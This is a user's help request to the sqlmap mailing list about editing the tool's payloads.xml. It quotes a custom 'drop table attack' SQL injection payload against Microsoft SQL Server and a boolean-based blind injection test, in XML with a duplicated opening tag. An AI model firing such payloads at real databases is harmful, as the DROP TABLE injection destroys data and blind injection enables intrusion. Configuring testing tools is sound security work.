Hi! In payloads.xml I substituted this snippet:

<!-- End of AGAINST boolean full-text search boundaries -->
<!-- Boolean-based blind tests - WHERE/HAVING clause -->
<test>
<test>
  <title>drop table attack</title>
  <stype>2</stype>
  <level>1</level>
  <risk>5</risk>
  <clause>1</clause>
  <where>1</where>
  <vector>c'); DROP TABLE [testTable] --</vector>
  <request>
    <payload>c'); DROP TABLE [testTable] --</payload>
    <comment>--</comment>
  </request>
  <response>
    <grep>object</grep>
  </response>
  <details>
    <dbms>Microsoft SQL Server</dbms>
  </details>
</test>
<test>
  <title>AND boolean-based blind - WHERE or HAVING clause</title>
  <stype>1</stype>
  <level>1</level>
  <risk>1</risk>
  <clause>1</clause>
  <where>1</where>
  <vector>AND [INFERENCE]</vector>
  <request>
    <payload>AND [RANDNUM]=[RANDNUM]</payload>
  </request>
  <response>
    <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
  </response>
</test>

with this:

<!-- End of AGAINST boolean full-text search boundaries -->
<!-- Boolean-based blind tests - WHERE/HAVING clause -->
<test>
<test>
  <title>AND boolean-based blind - WHERE or HAVING clause</title>
  <stype>1</stype>
  <level>1</level>
  <risk>1</risk>
  <clause>1</clause>
  <where>1</where>
  <vector>AND [INFERENCE]</vector>
  <request>
    <payload>AND [RANDNUM]=[RANDNUM]</payload>
  </request>
  <response>
    <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
  </response>
</test>

but it doesn't work.
Thank you



_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
